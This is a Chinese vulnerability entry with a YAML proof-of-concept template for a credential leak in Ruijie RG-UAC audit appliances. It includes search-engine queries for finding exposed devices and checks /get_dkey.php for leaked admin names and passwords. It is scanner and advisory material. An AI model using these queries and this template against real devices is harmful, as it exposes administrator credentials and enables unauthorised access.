漏洞描述
锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台。
Fofa: title="RG-UAC登录页面" && body="admin" || app="Ruijie-RG-UAC" || title="rg-uac"
Hunter: app.name="Ruijie 锐捷 RG-UAC"
Zoomeye: app:"锐捷RG-UAC统一上网行为管理审计系统"
ruijie-rg-uac-account-password-leakage: 锐捷RG-UAC存在管理账号密码泄露
PoC代码[已公开]
id: ruijie-rg-uac-account-password-leakage
info:
name: 锐捷RG-UAC存在管理账号密码泄露
author: Y3y1ng
severity: MEDIUM
verified: true
description: |-
锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台。
Fofa: title="RG-UAC登录页面" && body="admin" || app="Ruijie-RG-UAC" || title="rg-uac"
Hunter: app.name="Ruijie 锐捷 RG-UAC"
Zoomeye: app:"锐捷RG-UAC统一上网行为管理审计系统"
reference:
- https://mp.weixin.qq.com/s/rsDCydIJd1gNvXBFKdWeHw
tags: ruijie,password,leakage
created: 2023/12/10
rules:
r0:
request:
method: GET
expression: |
response.status == 200 &&
response.body.bcontains(b'get_dkey_passwd(user)') &&
response.body.bcontains(b'"name":') &&
response.body.bcontains(b'"password":')
r1:
request:
method: GET
path: /get_dkey.php
expression: |
response.status == 200 &&
response.body.bcontains(b'get_dkey_passwd(user)') &&
response.body.bcontains(b'"name":') &&
response.body.bcontains(b'"password":')
expression: r0() || r1()